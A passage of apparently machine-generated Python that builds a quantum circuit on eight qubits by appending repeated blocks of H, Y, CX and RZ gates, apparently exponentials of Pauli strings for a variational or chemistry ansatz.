sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.509321, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.692815, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(6, 2))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.448221, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.525158, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
